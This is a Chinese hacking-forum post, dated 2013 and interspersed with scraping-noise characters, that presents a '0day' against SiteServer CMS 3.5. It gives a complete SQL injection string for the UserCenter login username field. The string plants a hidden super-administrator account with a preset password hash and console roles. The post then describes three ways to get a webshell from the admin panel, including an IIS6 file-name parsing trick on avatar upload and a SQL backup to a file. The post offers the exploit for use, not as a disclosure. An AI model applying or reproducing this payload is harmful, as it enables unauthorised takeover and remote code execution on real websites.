找回密码
 立即注册
查看: 3043|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
7 M# b9 i0 r# O( W2 z; c+ F, ]( v. ?
stieserver官网:www.siteserver.cn0 U1 [6 l2 R2 s0 i& W7 T3 L

+ r% d% e0 Q% }- T0 r6 Q
1 K) Z: A: c6 e
/ x9 c. d. U& Q% @- j8 _- Z% z% PEXP:+ [: i; N, f6 N' Z4 _2 u

' d2 p, d2 y  `: K8 h直接访问UserCenter/login.aspx$ d/ E  t9 [+ @+ W3 e9 _
8 R8 m! u; t1 Y8 n" _3 x. {
& J. ^2 F* g! e7 m* `- _. Y. j

4 M4 Q$ a# [  s# s9 U: ?  t用户名处输入:
( [9 G# ^) Y' A+ @' p8 v
: Q7 w9 ^4 l: s1 [8 H4 X123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
3 `. e4 q2 Z2 o& Y9 i& o; w3 i) o. ]

6 Q) _* p9 ]5 V. K7 }1 z+ n3 Y, I: O7 P: ~4 n( E: {: {1 W4 |" U; V
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。% K. g- J; G% _
% O+ B- a& x" a" v  ~  R

* u. l) R& Q" c- v7 u# Z
9 d6 l) P9 S* U5 _) |之后再访问后台SiteServer/login.aspx用插入的用户登陆
  x* ?0 @1 p( q4 q' h) ]* l: v. D* ~! w6 R" Z' e& g1 L
& }- M5 [1 p) F, ~( Z, t& X1 K

/ p: b* u. W' z: h* P后台拿webshell的三种方法:6 ]+ P# I9 h& \

; I5 g$ A( J( |( A) {一、
! c! E' L/ p& d1 c2 n2 A6 _- G3 V+ r: Q5 V) p+ S, \
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx. C" ?: G/ R* X9 z5 S6 q
  d4 s! |3 j" k) b
二、) y3 I7 }5 n& i6 ^4 I  A# g
- S' s3 B# }' _) k( B
成员权限-》添加用户-》用户名为:1.asp1 R  K& c3 S$ A1 H4 C* v, `* n

! B9 `9 \0 o6 q* A  P0 k6 M% G! c; bhttp://127.0.0.1/usercenter/8 ~; r* s0 t8 c: y
- Z. h8 v" r4 ~
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
% M' i: b. m* U8 Y5 S
: ~  r8 C5 @3 E(ps:后台添加用户时不会验证是否含有非法字符)2 s4 X, e# k- i
, a/ r$ K& u8 h6 r5 w" |
三、
7 d# j; w9 N. F5 q+ W& Y0 u: n5 m- Q' q  l; ?! w
系统工具-》实用工具-》机器参数查看. N1 z5 ~: u- V0 G, ?; I
可以看到数据库类型、名称,WEB路径, C) j0 _/ e- y6 t6 p% K9 ]
3 ]" I( \/ ^7 r1 N" |
系统工具-》数据库工具-》SQL语句查询+ c" o0 `# O- A% B3 h+ O/ m
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。2 j7 u/ ^1 a: R. z5 e/ M

7 N) h3 I( c9 [+ i( x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表